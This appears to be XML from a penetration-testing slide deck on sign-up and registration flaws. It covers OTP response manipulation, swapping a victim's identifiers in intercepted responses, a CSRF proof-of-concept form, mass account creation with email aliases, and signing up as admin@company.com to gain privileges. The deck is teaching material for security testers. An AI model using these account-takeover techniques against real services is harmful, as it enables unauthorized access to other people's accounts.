              <a:t>200 OK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Access-Control-Allow-Origin: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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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{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	"status" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,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	"message" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTP Matched Successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="629" name="Google Shape;629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7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36" name="Google Shape;636;p7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7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38" name="Google Shape;638;p7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You Can </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Register</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> By Using Mobile-Number </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , The Server Will Ask You about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OTP So Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulate The Response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If You Entered a Wrong Mobile-Number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39" name="Google Shape;63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7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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 OK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Access-Control-Allow-Origin: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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{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	"status" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,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	"message" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OTP Matched Successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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}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641" name="Google Shape;641;p7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42" name="Google Shape;642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48" name="Google Shape;648;p7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7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50" name="Google Shape;650;p7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change Any UUID e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phone</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In The Response To UUID Of Victim Account While Intercepting Response Of Request Of The Sign Up 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51" name="Google Shape;65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7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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>200 OK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Access-Control-Allow-Origin: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Access-Control-Allow-Credentials: true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application/json; charset=utf-8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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length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{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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"email" : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ,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	"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" : "/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dashboard</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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}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653" name="Google Shape;653;p7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54" name="Google Shape;654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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n't CSRF Token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Anti-CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Try To Create CSRF POC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660" name="Google Shape;660;p7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﻿&lt;html&gt;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&lt;body&gt;&lt;form method="POST" action="https://www.company.com"&gt;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&lt;input type="text" value="me@gmail.com" name="email"&gt;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&lt;input type="text" value="Secrete" name="password"&gt;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&lt;input type="submit" value="Click"&gt;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&lt;/form&gt;&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="661" name="Google Shape;66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7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63" name="Google Shape;663;p7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7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65" name="Google Shape;665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7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7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72" name="Google Shape;672;p7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7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74" name="Google Shape;674;p7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Retrieve Data From </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deleted Account</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , By Signing Up With the Old-Email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Address That Was Associated To it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75" name="Google Shape;67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7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77" name="Google Shape;677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6000" y="2675525"/>
            <a:ext cx="4973700" cy="20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6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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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b="1" sz="96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85" name="Google Shape;685;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775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686" name="Google Shape;686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50" y="4049201"/>
            <a:ext cx="727375" cy="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76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603265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76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175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76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834570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Note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41" name="Google Shape;24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00" y="150875"/>
            <a:ext cx="1278801" cy="127880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Note That , Gmail </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Treats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Me@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Me+1@gmail.com As One Email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, So When You Need To Create Multi Accounts , Use This Feature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43" name="Google Shape;243;p4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user+1@gmail.com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user+2@gmail.com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user+ANYSTRING@gmail.com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user@gmail.com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use.r@gmail.com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us.er@gmail.com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u.ser@gmail.com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44" name="Google Shape;244;p43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45" name="Google Shape;24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3091500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48" name="Google Shape;248;p43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49" name="Google Shape;249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2925" y="350747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Note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56" name="Google Shape;25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00" y="150875"/>
            <a:ext cx="1278801" cy="127880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You Can Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collaborator </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Create Multi Accounts e.g.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 me@one.id.collaborator.net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me@two.id.collaborator.net </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc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58" name="Google Shape;258;p4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me@one.id.collaborator.net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me@two.id.collaborator.net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me@three.id.collaborator.net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me@four.id.collaborator.net</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00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         …..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59" name="Google Shape;259;p4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60" name="Google Shape;26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Note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67" name="Google Shape;26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00" y="150875"/>
            <a:ext cx="1278801" cy="127880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Google's ReCAPTCHA Try To Configure TLS Pass Through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Of Burp Suite e.g.   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.*google.com.*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269" name="Google Shape;269;p4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Go To Burp Suite Project Configurations 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Go To TLS Pass Through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 Click Add Then Enter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	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.*google.com.*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70" name="Google Shape;270;p4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71" name="Google Shape;27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7" name="Google Shape;277;p4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79" name="Google Shape;279;p4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Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Existing Em</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ail Address e.g. existing@gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Sometimes Authorization Token Will Reflect In Response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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80" name="Google Shape;28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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@gmail.com</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00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&amp;password=*****&amp;captcha=Random&amp;token=CSRF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282" name="Google Shape;282;p4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83" name="Google Shape;28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6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85" name="Google Shape;28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307320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91" name="Google Shape;291;p4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93" name="Google Shape;293;p4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Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Mail Address e.g. admin@company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To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Gain Extra Authorities OR Get More Functionalities</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  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94" name="Google Shape;29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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@company.com</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00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&amp;password=*****&amp;captcha=Random&amp;token=CSRF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296" name="Google Shape;296;p4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F3F3F3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F3F3F3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="Google Shape;29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7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99" name="Google Shape;299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07320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7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01" name="Google Shape;301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25" y="3525200"/>
            <a:ext cx="4210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4025" y="39399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7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09" name="Google Shape;309;p4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11" name="Google Shape;311;p4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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sign Up With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company Mail Address Plus Space e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@company.com </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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Gain Extra Authorities OR Get More Functionalities  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12" name="Google Shape;31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/signUp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firstname=I&amp;lastname=am&amp;email=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin@company.com</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00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&amp;password=*****&amp;captcha=Random&amp;token=CSRF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314" name="Google Shape;314;p4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15" name="Google Shape;31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